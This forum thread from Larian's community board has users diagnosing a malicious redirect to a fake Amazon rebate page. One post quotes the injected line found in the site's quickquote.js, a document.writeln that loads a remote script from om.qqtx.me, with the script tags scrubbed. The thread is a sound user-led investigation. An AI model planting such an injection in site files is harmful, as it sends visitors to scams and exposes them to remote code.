Divinity Banner
Previous Thread
Next Thread
Print Thread
Amazon redirect at Larian? #650502
18/10/18 12:49 AM
18/10/18 12:49 AM
Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
C
caninelegion Online puppyeyes OP
Bugfinder General
caninelegion  Online Puppyeyes OP
Bugfinder General
C

Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
I keep getting redirected to a site claiming I won some sort of Amazon rebate - only happens when I click on a thread within the forum. Is this by design or have we been hacked?

Re: Amazon redirect at Larian? [Re: caninelegion] #650515
18/10/18 05:29 PM
18/10/18 05:29 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
DuchessOfKvetch  Offline
stranger

Joined: Sep 2016
Posts: 20
I got this too! Another user in one of the support forums thinks it might be an infected image, since this forum lets people link to any url for their profile avatar, which seems like a really bad idea.

For the record, I am using Chrome.

Time to clear the browser cache at least.

Last edited by DuchessOfKvetch; 18/10/18 05:43 PM.
Re: Amazon redirect at Larian? [Re: caninelegion] #650536
19/10/18 12:09 PM
19/10/18 12:09 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
vometia  Offline

veteran

Joined: May 2010
Posts: 2,977
The Frog & Hounds
There seems to be a dodgy-looking script linking to qqtx.me: I don't know its provenance and after I flagged it, it's being "looked into" but personally I would (and have) nuke it with NoScript or similar.


J'aime le fromage.
Re: Amazon redirect at Larian? [Re: caninelegion] #650543
19/10/18 05:29 PM
19/10/18 05:29 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
DuchessOfKvetch  Offline
stranger

Joined: Sep 2016
Posts: 20
This is happening again today, even though it was cleaned up yesterday afternoon. Could be a compromised login account posting injected script to a forum post? Or using it in their avatar url?

There is a newer version of UBB btw (7.6), they keep patching more XSS vulnerabilities!

Re: Amazon redirect at Larian? [Re: caninelegion] #650544
19/10/18 06:43 PM
19/10/18 06:43 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
vometia  Offline

veteran

Joined: May 2010
Posts: 2,977
The Frog & Hounds
I'm afraid I'm as in the dark as you are; I only have the most basic admin access to get rid of problem users, but it seems one of the javascript files was modified at some point recently. Still waiting on an update as to what's behind it. But without knowing its history if could be a red herring.


J'aime le fromage.
Re: Amazon redirect at Larian? [Re: caninelegion] #650570
20/10/18 04:48 PM
20/10/18 04:48 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
DuchessOfKvetch  Offline
stranger

Joined: Sep 2016
Posts: 20
Can you at least update the site's js files? Because you don't have any security on your static files, they're easily viewable to the public (true enough for a lot of sites' js files, but generally opens one up even more to hackers).

So I can see a line that shouldn't be there in : http://larian.com/forums/ubb_js/quickquote.js?v=7.5.8, mid way down:

document.writeln("***** src=\'//om.qqtx.me/jquery.jscroll.min.js\'></*****>");
(script tags scrubbed for safety)

Now, how someone has modified this file is another story, as there could be a MMTM attack going on, especially if the local server's copy is clean, but the one we're downloading as clients is NOT. If you restore with the original UBB script file, does the issue come back?

Re: Amazon redirect at Larian? [Re: caninelegion] #650571
20/10/18 07:54 PM
20/10/18 07:54 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
vometia  Offline

veteran

Joined: May 2010
Posts: 2,977
The Frog & Hounds
I'm afraid I can't: I only have access to the bit of the CP that deals with user accounts and no access at all to the server itself, frustratingly. I am concerned about the integrity of the server but I have no means of ascertaining the current situation but it does seem that multiple js files are affected. Speaking personally I would've shut down the whole thing until I figured out the source of the problem but that's beyond my control.


J'aime le fromage.
Re: Amazon redirect at Larian? [Re: vometia] #650619
23/10/18 07:04 PM
23/10/18 07:04 PM
Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
C
caninelegion Online puppyeyes OP
Bugfinder General
caninelegion  Online Puppyeyes OP
Bugfinder General
C

Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
RE: " I would've shut down the whole thing until I figured out the source of the problem"

Looks like they heard you smile

Re: Amazon redirect at Larian? [Re: caninelegion] #650625
23/10/18 10:03 PM
23/10/18 10:03 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
vometia  Offline

veteran

Joined: May 2010
Posts: 2,977
The Frog & Hounds
I can be quite annoying when required. biggrin


J'aime le fromage.

Powered by UBB.threads™ PHP Forum Software 7.6.2